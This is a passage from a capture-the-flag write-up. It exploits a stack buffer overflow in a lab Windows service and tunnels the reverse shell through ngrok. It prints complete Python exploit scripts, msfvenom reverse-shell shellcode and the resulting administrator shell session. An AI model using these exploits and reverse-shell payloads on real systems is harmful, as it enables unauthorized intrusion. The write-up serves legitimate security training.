buf += b"\xf6\x5a\xb3\xb0\x2c\x27\xf3\x3b\xc3\xd8\xba\xcb\xae"
buf += b"\xca\x2b\x3c\xe5\xb0\xfa\x43\xd3\xdc\x61\xd1\xb8\x1c"
buf += b"\xef\xca\x16\x4b\xb8\x3d\x6f\x19\x54\x67\xd9\x3f\xa5"
buf += b"\xf1\x22\xfb\x72\xc2\xad\x02\xf6\x7e\x8a\x14\xce\x7f"
buf += b"\x96\x40\x9e\x29\x40\x3e\x58\x80\x22\xe8\x32\x7f\xed"
buf += b"\x7c\xc2\xb3\x2e\xfa\xcb\x99\xd8\xe2\x7a\x74\x9d\x1d"
buf += b"\xb2\x10\x29\x66\xae\x80\xd6\xbd\x6a\xa0\x34\x17\x87"
buf += b"\x49\xe1\xf2\x2a\x14\x12\x29\x68\x21\x91\xdb\x11\xd6"
buf += b"\x89\xae\x14\x92\x0d\x43\x65\x8b\xfb\x63\xda\xac\x29"

# 998 bytes of padding, the JMP ESP address (little-endian), a NOP sled for the
# decoder stub to unpack into, then the encoded shellcode; everything is bytes.
buffer = b"A" * 998 + b"\xA0\x12\x50\x62" + b"\x90" * 147 + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("192.168.1.6", 13337))
s.recv(1024)
s.send(b"SECRET" + buffer + b"\r\n")
s.close()

We used an encoder to generate the payload, so the decoder stub needs some room in memory to unpack it; that is why we added the "\x90" (NOP) bytes before the shellcode.

By running our exploit we successfully receive a reverse shell. But so far we have only obtained a reverse shell from our local machine; we still need to run this exploit against the Crashed machine to get the flag.

Root

IP tunneling

I tried to run the same exploit against the real machine, but I didn't receive a reverse shell back. The problem was that the target has a public IP address while my network sits behind NAT/firewall, so we need to figure out a way to get a successful reverse shell. This can be achieved in several ways:

  • Using VPS with public IP and exposed to the internet to receive the reverse shell response to a specified port, This is a costly solution.

  • Configure a port forward method on my network router, this requires admin access to the Router/Modem and some advanced configuration.

  • The ultimate solution is to use the application to tunnel all the traffic to my host.

The easiest solution here is to use ngrok, an application that tunnels traffic from a public IP to your machine. It can be set up easily by following the documentation.

https://ngrok.com/

I will run ngrok on my Linux machine to tunnel the traffic to localhost on port 9001.

root@kali:~# /ngrok tcp 9001
ngrok by @inconshreveable                                                                                             (Ctrl+C to quit)
                                                                                                                                 
Session Status                online                                                                                                
Account                       Muhammad (Plan: Free)                                                                                   
Version                       2.3.40                                                                                                  
Region                        United States (us)                                                                                      
Web Interface                 http://127.0.0.1:4040                                                                                   
Forwarding                    tcp://8.tcp.ngrok.io:11581 -> localhost:9001                                                                                                                                                      
Connections                   ttl     opn     rt1     rt5     p50     p90                                                             
                              6       0       0.00    0.00    0.00    282.54 

Remote Exploit

Now, the final step is to change the IP of the reverse shell. We put in ngrok's IP and port so that the reverse shell connects there, and ngrok then tunnels it to our local machine.

root@kali:~/CyberTalents/Crashed# msfvenom -p windows/shell_reverse_tcp LHOST=8.tcp.ngrok.io LPORT=11581 EXITFUNC=thread -f py -a x86 –platform windows -b "\x00"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of py file: 1712 bytes
buf =  b""
buf += b"\xbf\xbf\xb5\x81\x09\xda\xcc\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xc5\xbb\x63"
buf += b"\xfc\xc5\x2c\xe1\xff\x35\xad\x86\x76\xd0\x9c\x86\xed"
buf += b"\x91\x8f\x36\x65\xf7\x23\xbc\x2b\xe3\xb0\xb0\xe3\x04"
buf += b"\x70\x7e\xd2\x2b\x81\xd3\x26\x2a\x01\x2e\x7b\x8c\x38"
buf += b"\xe1\x8e\xcd\x7d\x1c\x62\x9f\xd6\x6a\xd1\x0f\x52\x26"
buf += b"\xea\xa4\x28\xa6\x6a\x59\xf8\xc9\x5b\xcc\x72\x90\x7b"
buf += b"\xef\x57\xa8\x35\xf7\xb4\x95\x8c\x8c\x0f\x61\x0f\x44"
buf += b"\x5e\x8a\xbc\xa9\x6e\x79\xbc\xee\x49\x62\xcb\x06\xaa"
buf += b"\x1f\xcc\xdd\xd0\xfb\x59\xc5\x73\x8f\xfa\x21\x85\x5c"
buf += b"\x9c\xa2\x89\x29\xea\xec\x8d\xac\x3f\x87\xaa\x25\xbe"
buf += b"\x47\x3b\x7d\xe5\x43\x67\x25\x84\xd2\xcd\x88\xb9\x04"
buf += b"\xae\x75\x1c\x4f\x43\x61\x2d\x12\x0c\x46\x1c\xac\xcc"
buf += b"\xc0\x17\xdf\xfe\x4f\x8c\x77\xb3\x18\x0a\x80\xb4\x32"
buf += b"\xea\x1e\x4b\xbd\x0b\x37\x88\xe9\x5b\x2f\x39\x92\x37"
buf += b"\xaf\xc6\x47\x97\xff\x68\x38\x58\xaf\xc8\xe8\x30\xa5"
buf += b"\xc6\xd7\x21\xc6\x0c\x70\xcb\x3d\xc7\x7c\x82\x9a\x13"
buf += b"\xeb\x98\xe4\x36\xd6\x15\x02\x22\x38\x70\x9d\xdb\xa1"
buf += b"\xd9\x55\x7d\x2d\xf4\x10\xbd\xa5\xfb\xe5\x70\x4e\x71"
buf += b"\xf5\xe5\xbe\xcc\xa7\xa0\xc1\xfa\xcf\x2f\x53\x61\x0f"
buf += b"\x39\x48\x3e\x58\x6e\xbe\x37\x0c\x82\x99\xe1\x32\x5f"
buf += b"\x7f\xc9\xf6\x84\xbc\xd4\xf7\x49\xf8\xf2\xe7\x97\x01"
buf += b"\xbf\x53\x48\x54\x69\x0d\x2e\x0e\xdb\xe7\xf8\xfd\xb5"
buf += b"\x6f\x7c\xce\x05\xe9\x81\x1b\xf0\x15\x33\xf2\x45\x2a"
buf += b"\xfc\x92\x41\x53\xe0\x02\xad\x8e\xa0\x23\x4c\x1a\xdd"
buf += b"\xcb\xc9\xcf\x5c\x96\xe9\x3a\xa2\xaf\x69\xce\x5b\x54"
buf += b"\x71\xbb\x5e\x10\x35\x50\x13\x09\xd0\x56\x80\x2a\xf1"

Then we edit our exploit to look like the following. Note that the secure server is running on the remote machine on port 1887, so we have to change that too:

#!/usr/bin/python3
import socket

buf =  b""
buf += b"\xb8\x42\x49\xf8\x19\xd9\xed\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x52\x83\xed\xfc\x31\x45\x0e\x03\x07\x47\x1a"
buf += b"\xec\x7b\xbf\x58\x0f\x83\x40\x3d\x99\x66\x71\x7d\xfd"
buf += b"\xe3\x22\x4d\x75\xa1\xce\x26\xdb\x51\x44\x4a\xf4\x56"
buf += b"\xed\xe1\x22\x59\xee\x5a\x16\xf8\x6c\xa1\x4b\xda\x4d"
buf += b"\x6a\x9e\x1b\x89\x97\x53\x49\x42\xd3\xc6\x7d\xe7\xa9"
buf += b"\xda\xf6\xbb\x3c\x5b\xeb\x0c\x3e\x4a\xba\x07\x19\x4c"
buf += b"\x3d\xcb\x11\xc5\x25\x08\x1f\x9f\xde\xfa\xeb\x1e\x36"
buf += b"\x33\x13\x8c\x77\xfb\xe6\xcc\xb0\x3c\x19\xbb\xc8\x3e"
buf += b"\xa4\xbc\x0f\x3c\x72\x48\x8b\xe6\xf1\xea\x77\x16\xd5"
buf += b"\x6d\xfc\x14\x92\xfa\x5a\x39\x25\x2e\xd1\x45\xae\xd1"
buf += b"\x35\xcc\xf4\xf5\x91\x94\xaf\x94\x80\x70\x01\xa8\xd2"
buf += b"\xda\xfe\x0c\x99\xf7\xeb\x3c\xc0\x9f\xd8\x0c\xfa\x5f"
buf += b"\x77\x06\x89\x6d\xd8\xbc\x05\xde\x91\x1a\xd2\x21\x88"
buf += b"\xdb\x4c\xdc\x33\x1c\x45\x1b\x67\x4c\xfd\x8a\x08\x07"
buf += b"\xfd\x33\xdd\x88\xad\x9b\x8e\x68\x1d\x5c\x7f\x01\x77"
buf += b"\x53\xa0\x31\x78\xb9\xc9\xd8\x83\x2a\xf5\x92\x2c\xae"
buf += b"\x91\xa8\x32\x82\x5c\x24\xd4\xb6\x8e\x60\x4f\x2f\x36"
buf += b"\x29\x1b\xce\xb7\xe7\x66\xd0\x3c\x04\x97\x9f\xb4\x61"
buf += b"\x8b\x48\x35\x3c\xf1\xdf\x4a\xea\x9d\xbc\xd9\x71\x5d"
buf += b"\xca\xc1\x2d\x0a\x9b\x34\x24\xde\x31\x6e\x9e\xfc\xcb"
buf += b"\xf6\xd9\x44\x10\xcb\xe4\x45\xd5\x77\xc3\x55\x23\x77"
buf += b"\x4f\x01\xfb\x2e\x19\xff\xbd\x98\xeb\xa9\x17\x76\xa2"
buf += b"\x3d\xe1\xb4\x75\x3b\xee\x90\x03\xa3\x5f\x4d\x52\xdc"
buf += b"\x50\x19\x52\xa5\x8c\xb9\x9d\x7c\x15\xd9\x7f\x54\x60"
buf += b"\x72\x26\x3d\xc9\x1f\xd9\xe8\x0e\x26\x5a\x18\xef\xdd"
buf += b"\x42\x69\xea\x9a\xc4\x82\x86\xb3\xa0\xa4\x35\xb3\xe0"

# Same layout as the local exploit, with the new shellcode and the remote port.
buffer = b"A" * 998 + b"\xA0\x12\x50\x62" + b"\x90" * 40 + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("18.193.129.237", 1887))
s.recv(1024)
s.send(b"SECRET" + buffer + b"\r\n")
s.close()

And we got a reverse shell!

root@kali:~/CyberTalents/Crashed# python exploit-remote.py
root@kali:~# nc -nvlp 9001
listening on [any] 9001 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43124
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Users\Administrator\Desktop>whoami
whoami
ec2amaz-hf7234c\administrator

Flag

C:\Windows\system32>cd c:\Users\Administrator\Desktop 
cd c:\Users\Administrator\Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3467-4F3A

 Directory of c:\Users\Administrator\Desktop

09/14/2020  10:50 PM    <DIR>          .
09/14/2020  10:50 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
09/10/2020  12:35 AM                32 flag.txt
09/10/2020  04:38 PM    <DIR>          snapshot_2020-08-16_04-47
09/10/2020  04:38 PM        32,121,736 snapshot_2020-08-16_04-47.zip
09/14/2020  08:38 AM    <DIR>          vulnserver-master
               4 File(s)     32,122,849 bytes
               4 Dir(s)  16,779,464,704 bytes free

c:\Users\Administrator\Desktop>type flag.txt
type flag.txt
ffa3857489xxxxxxxxx474c9d
This post is licensed under CC BY 4.0 by the author.